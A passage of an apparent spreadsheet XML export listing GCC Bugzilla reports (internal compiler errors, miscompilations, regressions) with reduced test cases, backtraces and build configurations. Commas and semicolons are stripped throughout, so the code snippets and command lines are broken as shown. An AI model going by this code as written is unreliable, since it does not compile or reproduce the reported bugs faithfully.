	GNU C version 3.0.1 20010717 (prerelease) (m68k-linux)
		compiled by GNU C version 2.96-ia64-000717 snap 001117.
	xx.i: In function `__brk':
	xx.i:27: Internal compiler error in verify_wide_reg_1 at flow.c:2760
	Please submit a full bug report
	with preprocessed source if appropriate.
	See  for instructions.
	You have new mail in /suse/schwab/Mail/.incoming</t>
  </si>
  <si>
    <t>GCC-8726</t>
  </si>
  <si>
    <t>[3.2.1/3.3] gcc -O2 miscompiles Samba 2.2.7 on 32-bit sparc</t>
  </si>
  <si>
    <t xml:space="preserve">	Samba 2.2.7 (32-bit sparc) mishandles 64-bit file locks because
	GCC 3.2.1 miscompiles the file-locking code.  I have narrowed
	down the problem to a simple test case enclosed below.
Release:
3.2.1
Environment:
System: SunOS sic.twinsun.com 5.8 Generic_108528-17 sun4u sparc SUNWUltraSPARC-IIi-Engine
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.2.1/configure --disable-nls --enable-languages=cc++ --prefix=/opt/reb/lib/gcc/gcc-3.2.1 --with-system-zlib
How-To-Repeat:
	Compile and run the following program with gcc -O2 t.i ./a.out.
	a.out will exit with nonzero status it should exit with zero status.
# 1 t.c
# 1 
# 1 
# 1 t.c
int fcntl_lock(int fd int op long long offset long long count int type)
int vfswrap_lock(char *fsp int fd int op long long offset long long count int type)
{
  int result
  result = fcntl_lock(fd op offset counttype)
  return result
}
int fcntl_lock(int fd int op long long offset long long count int type)
{
  return type
}
int
main (void)
{
  return vfswrap_lock (0 1 2 3 4 5) != 5
}
The problem can be found in the assembly code for vfswrap_lock.
The st followed by the ldd puts garbage into the type argument.
vfswrap_lock:
	!#PROLOGUE# 0
	add	%sp -48 %sp
	!#PROLOGUE# 1
	mov	%o1 %o0
	mov	%o2 %o1
	mov	%o3 %o2
	st	%o5 [%sp+136]
	mov	%o4 %o3
	ldd	[%sp+136] %o4
	sethi	%hi(fcntl_lock) %g1
	jmpl	%g1 + %lo(fcntl_lock) %g0
	 sub	%sp -48 %sp</t>
  </si>
  <si>
    <t>GCC-28266</t>
  </si>
  <si>
    <t>[4.1 regression] ICE on invalid default variable</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
====================
struct A
{
  int i
  A(int = X)
}
void foo()
{
  A().i
}
====================
bug.cc:4: error: 'X' was not declared in this scope
bug.cc: In function 'void foo()':
bug.cc:9: internal compiler error: in gimple_add_tmp_var at gimplify.c:720
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-5913</t>
  </si>
  <si>
    <t>Core dump for String constant instanceof</t>
  </si>
  <si>
    <t xml:space="preserve">I encountered this while patching bug 5902. This program is legal and
should print true. Remember + has higher precedence than
instanceof and +1 is a constant with the value 1. A string
literal is always an instanceof String.
class Foo {
  public static void main(String[] args) {
    System.out.println((+1) instanceof String)
  }
}
Release:
3.1 20020309 (prerelease)
Environment:
System: Linux quaffle 2.4.9-13smp #1 SMP Tue Oct 30 19:57:16 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-threads=posix --prefix=/fpga3/users/eblake/gcc --enable-shared
How-To-Repeat:
bash-2.05$ gcj --main=Foo -o Foo Foo.java
Foo.java: In class `Foo':
Foo.java: In method `Foo.main(java.lang.String[])':
Foo.java:4: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
	</t>
  </si>
  <si>
    <t>GCC-48403</t>
  </si>
  <si>
    <t>[4.7 Regression] bootstrap comparison failure</t>
  </si>
  <si>
    <t>On Linux/x86 revision 171845 failed to bootstrap:
http://gcc.gnu.org/ml/gcc-regression/2011-04/msg00036.html
http://gcc.gnu.org/ml/gcc-regression/2011-04/msg00037.html
Comparing stages 2 and 3
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/combine.o differs
gcc/tree-into-ssa.o differs
gcc/graphite-sese-to-poly.o differs
gcc/tree-loop-distribution.o differs
libiberty/regex.o differs
libiberty/pic/regex.o differs
libiberty/sha1.o differs
Revision 171834 is OK.</t>
  </si>
  <si>
    <t>GCC-25758</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/20030921-1.c fails at -O0</t>
  </si>
  <si>
    <t>The fix is:
Index: i386.c
===================================================================
--- i386.c      (revision 109602)
+++ i386.c      (working copy)
@@ -66806 +66828 @@ output_pic_addr_const (FILE *file rtx x
       break
     case SYMBOL_REF:
+      if (SYMBOL_REF_DECL (x))
+       mark_decl_referenced (SYMBOL_REF_DECL (x))
       assemble_name (file XSTR (x 0))
       if (!TARGET_MACHO &amp;&amp; code == 'P' &amp;&amp; ! SYMBOL_REF_LOCAL_P (x))
        fputs (@PLT file)
---------
But I cannot test it at all</t>
  </si>
  <si>
    <t>GCC-67864</t>
  </si>
  <si>
    <t>[6 Regression] CSiBE size regression</t>
  </si>
  <si>
    <t>http://gcc.opensuse.org/CSiBE/ shows a big size regression between r228310 (good)
and r228359 (bad).  Flags used are -Os -fgnu89-inline suspect is
+2015-10-01  Segher Boessenkool  
+
+       * bb-reorder.c (reorder_basic_blocks): Use the algorithm selected
+       with flag_reorder_blocks_algorithm.
+       * common.opt (freorder-blocks-algorithm=): New flag.
+       (reorder_blocks_algorithm): New enum.
+       * flag-types.h (reorder_blocks_algorithm): New enum.
+       * opts.c (default_options_table): Use -freorder-blocks at -O1 and up
+       and -freorder-blocks-algorithm=stc at -O2 and up (not at -Os).
The size regression is from 3562398 bytes to 3617915 bytes.</t>
  </si>
  <si>
    <t>GCC-50635</t>
  </si>
  <si>
    <t>ICE on valid: segfault in vectorize_loops</t>
  </si>
  <si>
    <t>Created attachment 25431
small_ice.c
arm-none-eabi/gcc2/gcc/cc1 small_ice.c -O3 -quiet -mcpu=cortex-a9 -mfloat-abi=softfp -mfpu=neon 
small_ice.c: In function 'f0a':
small_ice.c:5:6: internal compiler error: Segmentation fault
Trace:
#0  flow_bb_inside_loop_p (loop=0x7ffff7436f68 bb=0x0) at /work/local-checkouts/main/gcc-fsf/gcc/cfgloop.c:776
#1  0x00000000009ef6ef in vect_is_simple_use (operand=0x7ffff74bfaa0 loop_vinfo= bb_vinfo=0x0 def_stmt=0x7fffffffe008 def=0x7fffffffe010 dt=0x7fffffffe01c) at /work/local-checkouts/main/gcc-fsf/gcc/tree-vect-stmts.c:5595
#2  0x00000000009f93dc in process_use (stmt=0x7ffff74b7580 use=0x7ffff74bfaa0 loop_vinfo=0x15077a0 live_p= relevant=vect_used_in_scope worklist=) at /work/local-checkouts/main/gcc-fsf/gcc/tree-vect-stmts.c:368
#3  0x00000000009f9e69 in vect_mark_stmts_to_be_vectorized (loop_vinfo=0x15077a0) at /work/local-checkouts/main/gcc-fsf/gcc/tree-vect-stmts.c:658
#4  0x0000000000a0bae1 in vect_analyze_loop_2 (loop=0x7ffff7436f68) at /work/local-checkouts/main/gcc-fsf/gcc/tree-vect-loop.c:1504
#5  vect_analyze_loop (loop=0x7ffff7436f68) at /work/local-checkouts/main/gcc-fsf/gcc/tree-vect-loop.c:1650
#6  0x0000000000a18e4e in vectorize_loops () at /work/local-checkouts/main/gcc-fsf/gcc/tree-vectorizer.c:203
#7  0x00000000007d7859 in execute_one_pass (pass=0x129b760) at /work/local-checkouts/main/gcc-fsf/gcc/passes.c:2064
#8  0x00000000007d7bd5 in execute_pass_list (pass=0x129b760) at /work/local-checkouts/main/gcc-fsf/gcc/passes.c:2119
#9  0x00000000007d7be7 in execute_pass_list (pass=0x129b580) at /work/local-checkouts/main/gcc-fsf/gcc/passes.c:2120
#10 0x00000000007d7be7 in execute_pass_list (pass=0x129ac80) at /work/local-checkouts/main/gcc-fsf/gcc/passes.c:2120
#11 0x00000000008deca8 in tree_rest_of_compilation (fndecl=0x7ffff7437400) at /work/local-checkouts/main/gcc-fsf/gcc/tree-optimize.c:420
#12 0x00000000005c09ce in cgraph_expand_function (node=0x7ffff75a4120) at /work/local-checkouts/main/gcc-fsf/gcc/cgraphunit.c:1805
#13 0x00000000005c3fca in cgraph_expand_all_functions () at /work/local-checkouts/main/gcc-fsf/gcc/cgraphunit.c:1864
#14 cgraph_optimize () at /work/local-checkouts/main/gcc-fsf/gcc/cgraphunit.c:2141
#15 0x00000000005c44ea in cgraph_finalize_compilation_unit () at /work/local-checkouts/main/gcc-fsf/gcc/cgraphunit.c:1312
#16 0x00000000004a6e08 in c_write_global_declarations () at /work/local-checkouts/main/gcc-fsf/gcc/c-decl.c:9936
#17 0x000000000087bcca in compile_file (argc=7 argv=0x7fffffffe4b8) at /work/local-checkouts/main/gcc-fsf/gcc/toplev.c:581
#18 do_compile (argc=7 argv=0x7fffffffe4b8) at /work/local-checkouts/main/gcc-fsf/gcc/toplev.c:1925
#19 toplev_main (argc=7 argv=0x7fffffffe4b8) at /work/local-checkouts/main/gcc-fsf/gcc/toplev.c:2001
#20 0x00007ffff7874c4d in __libc_start_main () from /lib/libc.so.6
#21 0x0000000000496da9 in _start ()
ICE does not occur without -mfloat-abi=softfp -mfpu=neon.
This ICE happens with trunk version of end of August 2011 and perhaps earlier. It does not appear in gcc4.6. 
The code is invalid because uninitialized variable temp_3 is used.</t>
  </si>
  <si>
    <t>GCC-80659</t>
  </si>
  <si>
    <t>[7 Regression] -fsanitize=address evokes ICE in in gimplify_switch_expr</t>
  </si>
  <si>
    <t>The following gets an ICE with gcc 7 (latest from git at git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@247659 138bc75d-0d04-0410-961f-82ee72b054a4) yet gets no ICE with fedora 25's 6.3.1 20161221.
FYI this was minimized using creduce from emacs/src/process.c.
$ cat bad.c
typedef a
typedef b
struct c {
  b d
} e() {
  union {
    struct c f
  } g
  switch (g.f.d) {
    (a[]){}
    h()
  }
}
$ gcc -c -fsanitize=address bad.c                              
bad.c:1:9: warning: type defaults to 'int' in declaration of 'a' [-Wimplicit-int]
 typedef a
         ^
bad.c:2:9: warning: type defaults to 'int' in declaration of 'b' [-Wimplicit-int]
 typedef b
         ^
bad.c:5:1: warning: no semicolon at end of struct or union
 } e() {
 ^      
bad.c: In function 'e':
bad.c:8:3: warning: no semicolon at end of struct or union
   } g
   ^
bad.c:11:5: warning: implicit declaration of function 'h' [-Wimplicit-function-declaration]
     h()
     ^
bad.c:10:10: warning: statement will never be executed [-Wswitch-unreachable]
     (a[]){}
          ^
bad.c:9:3: internal compiler error: in gimplify_switch_expr at gimplify.c:2301
   switch (g.f.d) {
   ^~~~~~
0x7c6d6d gimplify_switch_expr
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:2301
0x7c890a gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:11466
0x7ca888 gimplify_stmt(tree_node** gimple**)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:6517
0x7c8e6b gimplify_statement_list
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:1718
0x7c8e6b gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:11686
0x7ca888 gimplify_stmt(tree_node** gimple**)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:6517
0x7cb1c8 gimplify_bind_expr
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:1292
0x7c86ea gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:11458
0x7ca888 gimplify_stmt(tree_node** gimple**)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:6517
0x7cbbe7 gimplify_body(tree_node* bool)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:12455
0x7cbf95 gimplify_function_tree(tree_node*)
        /data/users/meyering/x/w/co/gcc/gcc/gimplify.c:12613
0x69cf0f cgraph_node::analyze()
        /data/users/meyering/x/w/co/gcc/gcc/cgraphunit.c:657
0x69f6f7 analyze_functions
        /data/users/meyering/x/w/co/gcc/gcc/cgraphunit.c:1118
0x6a00d2 symbol_table::finalize_compilation_unit()
        /data/users/meyering/x/w/co/gcc/gcc/cgraphunit.c:2603
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-30230</t>
  </si>
  <si>
    <t>Incorrect ia64 EH info when an EH region ends in the middle of a bundle</t>
  </si>
  <si>
    <t>struct A {}
struct B { virtual ~B() }
B::~B () {}
struct C { void foo (short  }
struct D { void *d1 C *d2 virtual void virt (void) {} }
struct E { D *e1 B *e2 }
struct F { void bar (void * B  }
F *p __attribute__((weak))
volatile int r
void C::foo (short &amp;x B &amp;)
{
  if (r)
    throw A ()
  x = 1
}
void F::bar (void * B &amp;)
{
  throw A ()
}
void baz (E &amp;x)
{
  short g = 0
  B b = *x.e2
  x.e1-&gt;d2-&gt;foo (g b)
  if (g)
    p-&gt;bar(x.e1-&gt;d1 b)
}
int main ()
{
  F g
  D s
  E h
  p = 
  h.e1 = 
  try
    {
      baz (h)
    }
  catch (A &amp;)
    {
    }
  return 0
}
fails on ia64 at least with gcc trunk and 4.1.1 at -O2.
The problem is a br.call not at the end of a bundle where the EH region
ends right after it:
        .mbb
        ld8 r39 = [r15]
        br.call.sptk.many b0 = _ZN1F3barEPvR1B#
[.LEHE0:]
        nop 0
As br.call sets rp to the address of the next bundle when the personality
routine is called it doesn't think this call is inside of the .LEHB0 .. .LEHE0
EH region and calls std::terminate.</t>
  </si>
  <si>
    <t>GCC-82994</t>
  </si>
  <si>
    <t>ICE in gfc_match_deallocate at fortran/match.c:4478</t>
  </si>
  <si>
    <t>With invalid code (no pointer/allocatable attribute nor allocated) :
$ cat z1.f90
program p
   type t
   end type
   class(t) :: x
   deallocate (x)
end
$ gfortran-8-20171112 -c z1.f90
f951: internal compiler error: Segmentation fault
0xb61c7f crash_signal
        ../../gcc/toplev.c:325
0x6c33e3 gfc_match_deallocate()
        ../../gcc/fortran/match.c:4478
0x6dfe69 match_word_omp_simd
        ../../gcc/fortran/parse.c:93
0x6e48af match_word
        ../../gcc/fortran/parse.c:466
0x6e48af decode_statement
        ../../gcc/fortran/parse.c:466
0x6e5354 next_free
        ../../gcc/fortran/parse.c:1225
0x6e5354 next_statement
        ../../gcc/fortran/parse.c:1457
0x6e6c3c parse_spec
        ../../gcc/fortran/parse.c:3834
0x6e9133 parse_progunit
        ../../gcc/fortran/parse.c:5637
0x6ea6f4 gfc_parse_file()
        ../../gcc/fortran/parse.c:6177
0x72f13f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-61160</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] wrong code with -O3 (or ICE: verify_cgraph_node failed: edge points to wrong declaration)</t>
  </si>
  <si>
    <t>Created attachment 32785
reduced testcase (from g++.old-deja/g++.jason/thunk1.C)
Output:
$ g++ -O3 testcase.C
$ valgrind ./a.out
==21283== Invalid read of size 8
==21283==    at 0x400740: CExample::MixinFunc(int A) [clone .constprop.0] (testcase.C:3)
==21283==    by 0x40062A: main (testcase.C:27)
==21283==  Address 0x1 is not stack'd malloc'd or (recently) free'd
Tested revisions:
r210308 - fail
4.9 r210307 - fail
4.8 r210303 - OK</t>
  </si>
  <si>
    <t>GCC-81586</t>
  </si>
  <si>
    <t>valgrind error in output_buffer_append_r with -Wall</t>
  </si>
  <si>
    <t>Created attachment 41848
C++ source code
The attached C++ code when compiled by recent gcc trunk and 
compiler flag -Wall does this:
==19553== Conditional jump or move depends on uninitialised value(s)
==19553==    at 0x1227643: output_buffer_append_r (pretty-print.h:128)
==19553==    by 0x1227643: pp_append_r (pretty-print.c:258)
==19553==    by 0x1227643: pp_append_text(pretty_printer* char const* char con
st*) (pretty-print.c:892)
==19553==    by 0x12285E9: pp_format(pretty_printer* text_info*) (pretty-print.
c:670)
The bug seems to have been created between revisions 243987 and 249539.</t>
  </si>
  <si>
    <t>GCC-21456</t>
  </si>
  <si>
    <t>compile time regression(s) after gcc-4.0-20050326 4.0 (+300%) 4.1 (+500%)</t>
  </si>
  <si>
    <t>i used the file compiletimetest2.cc from the attachment in    
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=16613    
and noticed that compile time regressions were introduced after  
gcc-4.0-20050430  
i added the timings for the 4.0 snapshots to  
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=16613  
because there are also many older time reports.  
now here for gcc-4.1-20050508  
&gt; gcc-4.1-20050508 -v  
Using built-in specs.  
Target: i686-pc-linux-gnu  
Configured with: ../gcc-4.1-20050508/configure --prefix=/opt/gcc-4.1-20050508  
--program-suffix=-4.1-20050508 --enable-shared --enable-languages=cc++  
--enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu  
--disable-nls --disable-checking --with-arch=pentium3  
Thread model: posix  
gcc version 4.1.0 20050508 (experimental)  
&gt; time g++-4.1-20050508 -c -O3 -D __NDEBUG__ cotime g++-4.1-20050508 -c -O3 -D  
__DEBUG__ compiletimetest2.cc  
real    1m47.056s        user    1m45.474s      sys     0m1.392s 
&gt; time g++-4.1-20050508 -c -O3 -D __DEBUG__ compiletimetest2.cc  
real    1m53.201s        user    1m51.746s      sys     0m1.319s  
&gt; g++-4.1-20050508 -c -O3 -D __NDEBUG__ compiletimetest2.cc  -save-temps 
&gt; ls -al compiletimetest2.s 
-rw-r--r--    1 login500 users     1602910 May  8 23:20 compiletimetest2.s 
the assembler file increased once more now 1.603 mb gcc-3.4.3 (0.520mb) 
gcc-3.3.5 (0.355mb) 
gcc-3.4.3 did the whole thing in under 20s. 
gcc-3.3.5 under 11s 
i know i'm using -O3. But you see this is almost a factor of 8.5. 
Regards Andre</t>
  </si>
  <si>
    <t>andre.maute</t>
  </si>
  <si>
    <t>GCC-4128</t>
  </si>
  <si>
    <t>Bootstrap on solaris2.7 fails compiling libf2c/libF77/l_gt.c</t>
  </si>
  <si>
    <t>When bootstrapping with RTL checking enabled on
sparc-sun-solaris2.7 I get the following error after
the three-stage completes when compiling libf2c:
libf2c/libF77/l_gt.c: In function `l_gt':
libf2c/libF77/l_gt.c:11: RTL check: expected code `reg' have `subreg' in gen_v9_scc at config/sparc/sparc.c:2282
Release:
gcc 3.1 20010824 (experimental)
Environment:
sparc-sun-solaris2.7
How-To-Repeat:
configure --enable-checking=misctreertlgc and
make bootstrap on sparc-sun-solaris2.7</t>
  </si>
  <si>
    <t>GCC-22335</t>
  </si>
  <si>
    <t>DOM creates mis-matched types</t>
  </si>
  <si>
    <t>Take the following C code (and compile it at -O1 -fdelete-null-pointer-checks) :
int t(int *a)
{
  int i
  *a = 1
  i = a == 0
  return i
}
We get the wrong type for the rhs of the modify statement of i:
t1.c: In function 't':
t1.c:2: error: statement types mismatch
iD.1266_2 = 0
intD.0
_BoolD.1063</t>
  </si>
  <si>
    <t>GCC-52036</t>
  </si>
  <si>
    <t>C++11 allows template parameters to have internal linkage</t>
  </si>
  <si>
    <t>First gcc bug report so please be kind :-). When using pointers or references as template parameters C++03 requires these to have external linkage. I think (and could be wrong) that C++11 relaxes this restriction. I would expect the attached code to compile with g++ -std=c++0x but it does not.
testcase.cpp:
template  class TestClass
{
public:
  TestClass() : _val(val) { }
private:
  T _val
}
extern constexpr float e = 2.72
int main()
{
  constexpr float pi = 3.14
  /* Allowed in both C++03 and C++11. */
  TestClass test1
  /* Not allowed in C++03 because pi lacks external linkage...
   * But isn't this allowed in C++11? */
  TestClass test2
  return 0
}
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.2-12' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.2 (Debian 4.6.2-12)
$ g++ -std=c++0x -Wall -save-temps testcase.cpp
testcase.cpp: In function â€˜int main()â€™:
testcase.cpp:20:22: error: â€˜piâ€™ is not a valid template argument for type â€˜const float&amp;â€™ because object â€˜piâ€™ has not external linkage
testcase.cpp:20:29: error: invalid type in declaration before â€˜â€™ token
testcase.cpp:20:24: warning: unused variable â€˜test2â€™ [-Wunused-variable]
testcase.ii:
# 1 testcase.cpp
# 1 
# 1 
# 1 testcase.cpp
template  class TestClass
{
public:
  TestClass() : _val(val) { }
private:
  T _val
}
extern constexpr float e = 2.72
int main()
{
  constexpr float pi = 3.14
  TestClass test1
  TestClass test2
  return 0
}</t>
  </si>
  <si>
    <t>GCC-55852</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 regression] internal compiler error: in gfc_build_intrinsic_call at fortran/expr.c:4647</t>
  </si>
  <si>
    <t>Compilation of the following program causes internal compiler error:
!-----------------------------------
program bug
  implicit none
  Real allocatable:: a(:)
  allocate(a(1:3))
  print* ubound((a) 1) ! Bad
! print* ubound(a 1)   ! OK
! print* lbound((a) 1) ! OK
! print* lbound(a 1)   ! OK
  stop
end program bug
!------------------------------------
$ gfortran-mp-4.8 -Wall -Wextra bug.F90
f951: internal compiler error: in gfc_build_intrinsic_call at fortran/expr.c:4647
f951: internal compiler error: Abort trap
gfortran-mp-4.8: internal compiler error: Abort trap (program f951)
Abort trap
$ gfortran-mp-4.8 -v
Using built-in specs.
COLLECT_GCC=gfortran-mp-4.8
COLLECT_LTO_WRAPPER=/opt/local/libexec/gcc/x86_64-apple-darwin10/4.8.0/lto-wrapper
Target: x86_64-apple-darwin10
Configured with: ../gcc-4.8-20121223/configure --prefix=/opt/local --build=x86_64-apple-darwin10 --enable-languages=cc++objcobj-c++fortranjava --libdir=/opt/local/lib/gcc48 --includedir=/opt/local/include/gcc48 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --datarootdir=/opt/local/share/gcc-4.8 --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.8 --with-gxx-include-dir=/opt/local/include/gcc48/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --with-ppl=/opt/local --with-cloog=/opt/local --enable-cloog-backend=isl --disable-cloog-version-check --enable-stage1-checking --disable-multilib --enable-lto --enable-libstdcxx-time --with-as=/opt/local/bin/as --with-ld=/opt/local/bin/ld --with-ar=/opt/local/bin/ar --with-bugurl=https://trac.macports.org/newticket --with-pkgversion='MacPorts gcc48 4.8-20121223_0'
Thread model: posix
gcc version 4.8.0 20121223 (experimental) (MacPorts gcc48 4.8-20121223_0)</t>
  </si>
  <si>
    <t>latlon90180+gcc_bugzilla</t>
  </si>
  <si>
    <t>GCC-35393</t>
  </si>
  <si>
    <t>Deep templates get 40x slower when depth goes from 17 to 18.</t>
  </si>
  <si>
    <t>Dear G++ developers
*PLATFORM*
GCC 4.2.3 Intel Core 1 (32 bit) Kubuntu 8.04-alpha (Debian-based).
*DESCRIPTION OF THE PROBLEM*
When using nested templates such as
A z&gt; t&gt; u&gt;
the optimizer seems to give up some useful optimizations when the depth is greater than 17.
I know that the C++ standard only requires the compiler to support depth&lt;=17 but it still is very useful to be able to use deeper recursive templates. Also that's what g++'s option -ftemplate-depth-N seems to control. Unfortunately it doesn't seem to have any effect here.
*TESTCASE*
See attachment to this bug report (test.cpp). This is a very simple example of Expression Templates.
$ g++ -O3 -DDEPTH17 test.cpp -o test
$ time ./test
real    0m1.810s
$ g++ -O3 -DDEPTH18 test.cpp -o test
$ time ./test
real    1m9.941s
$ g++ -O3 -DDEPTH18 -ftemplate-depth-20 test.cpp -o test
$ time ./test
real    1m10.751s
*A MORE GENERAL QUESTION*
I hit this bug while developing an expression-templates library for linear algebra.
This bug might have little cousins. I have observed smaller performance issues in cases where the template depth was lower than 17 but where more complicated things were being done.
In test.cpp what really matters for performance is that g++ realizes that it needs not actually construct the objects of classes Sum and Int -- it only needs to emit the code of the value() method.
My general question would be is there a way to hint the g++ that a given class is a small helper class whose objects need not be actually constructed? Something like inline except it'd be for a class not a function.
g++ already does this inlining perfectly unless too complex things are being done. Is there some --param that I could try passing to g++ in order to make it handle more complex situations?</t>
  </si>
  <si>
    <t>jacob</t>
  </si>
  <si>
    <t>GCC-41702</t>
  </si>
  <si>
    <t>FAIL: abi/demangle/abi_text/09.cc execution test</t>
  </si>
  <si>
    <t>Program fails due to a segmentation fault:
Program received signal SIGSEGV Segmentation fault.
0x4000000000004264 in __gnu_test::verify_demangle (
    mangled= 
    wanted=0x4000000000002394 error code = -2: invalid mangled name)
    at /test/gnu/gcc/gcc/libstdc++-v3/testsuite/util/testsuite_hooks.cc:139
139             switch (status)</t>
  </si>
  <si>
    <t>GCC-34560</t>
  </si>
  <si>
    <t>[4.3 Regression] I/O internal read: END expected but no failure</t>
  </si>
  <si>
    <t>The following program should print OK. This is a regression as gfortran 4.1.3 and 4.2.2 print OK and not FAIL as gfortran 4.3.0.
(Found using the Fortran Company Fortran 90 Test Suite (Lite) Version 1.4)
implicit none
integer :: i
! NAME_FIELD is an internal file.
CHARACTER * 80 :: NAME_FIELD
integer::name_array(17)=0
do i=116
  write(name_field(5*i-4:5*i)(i5))i
end do
! If the array NAME_ARRAY has more than 16 elements
!   an end-of-file condition will occur and the statement
!   labeled 98 will be executed next.
READ (NAME_FIELD 100 END=98) NAME_ARRAY
100 FORMAT (16I5)
97 print*'FAIL - expected END=98'
stop
98 print*'OK'
end</t>
  </si>
  <si>
    <t>GCC-56743</t>
  </si>
  <si>
    <t>Namelist bug with comment and no blank</t>
  </si>
  <si>
    <t>Reduced test case (inspired by the one in PR 56660) originally reported by Kai Gallmeister:
integer :: value = 100
namelist /nml/ value
write (* nml=nml)
open (99 file='nml.dat' status=replace)
write(99*) &amp;nml
write(99*)   value=1!11
write(99*) /
rewind(99)
read (99 nml=nml)
write (* nml=nml)
close (99 status=delete)
end 
Output with 4.3 4.7 and trunk (haven't tried other versions):
&amp;NML
 VALUE=        100
 /
&amp;NML
 VALUE=        100
 /
Expected output:
&amp;NML
 VALUE=        100
 /
&amp;NML
 VALUE=          1
 /
The fact that there is no blank between the number and the comment should not make any difference right? Unfortunately it does ...</t>
  </si>
  <si>
    <t>GCC-1941</t>
  </si>
  <si>
    <t>int main()
{
double abcde
char *string
a=3
gcvt(a3string)
}
After compiling this code run the binary says
 Segmentation fault. If I use only double abcd  it works.
Release:
2.95.2
Environment:
Linux 2.2.14-SMP</t>
  </si>
  <si>
    <t>szallar</t>
  </si>
  <si>
    <t>GCC-57343</t>
  </si>
  <si>
    <t>[4.8 Regression] wrong code on x86_64-linux at -Os and above</t>
  </si>
  <si>
    <t>The following code is miscompiled on x86_64-linux at -Os and above with gcc trunk and at -O2 and above with gcc 4.8.  It outputs 0 rather than 4 as it should.  It works correctly with gcc 4.7.
$ gcc-trunk -v
gcc version 4.9.0 20130520 (experimental) [trunk revision 199099] (GCC) 
$ gcc-trunk -O1 wrong.c 
$ ./a.out 
4
$ gcc-4.7 -Os wrong.c 
$ ./a.out 
4
$ gcc-trunk -Os wrong.c 
$ ./a.out 
0
$
------------------------------
int printf (const char * ...)
int a[6]
int b c d e
int f[10] = { 0 0 0 0 0 1075L }
int *g = 
char h
unsigned i
void
fn1 (int p1)
{
    b = a[p1]
}
int
main ()
{
    for ( e &lt; 6 e++)
        a[e] = e
    i = -14
    for ( i &gt;= 8 i++)
    {
        d = --c
        h = d * 100L
        if (h)
        else
        {
            *g = 0
            break
        }
    }
    fn1 (f[5] &gt;&gt; 8 
    printf (%d\n b)
    return 0
}</t>
  </si>
  <si>
    <t>GCC-48007</t>
  </si>
  <si>
    <t>[x32] Unwind library doesn't work with UNITS_PER_WORD &gt; sizeof (void *)</t>
  </si>
  <si>
    <t>unwind-dw2.c has
/* This is the register and unwind state for a particular frame.  This
   provides the information necessary to unwind up past a frame and return
   to its caller.  */
struct _Unwind_Context
{
  void *reg[DWARF_FRAME_REGISTERS+1]
  void *cfa
  void *ra
  void *lsda
  struct dwarf_eh_bases bases
  /* Signal frame context.  */
#define SIGNAL_FRAME_BIT ((~(_Unwind_Word) 0 &gt;&gt; 1) + 1)
  /* Context which has version/args_size/by_value fields.  */
#define EXTENDED_CONTEXT_BIT ((~(_Unwind_Word) 0 &gt;&gt; 2) + 1)
  _Unwind_Word flags
  /* 0 for now can be increased when further fields are added to
     struct _Unwind_Context.  */
  _Unwind_Word version
  _Unwind_Word args_size
  char by_value[DWARF_FRAME_REGISTERS+1]
}
We can't save an integer register in void * if its size &gt; size of
void *.</t>
  </si>
  <si>
    <t>GCC-78162</t>
  </si>
  <si>
    <t>[7 Regression] ICE on invalid code at -Os and above on x86_64-linux-gnu: Segmentation fault</t>
  </si>
  <si>
    <t>This is a regression from 6.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
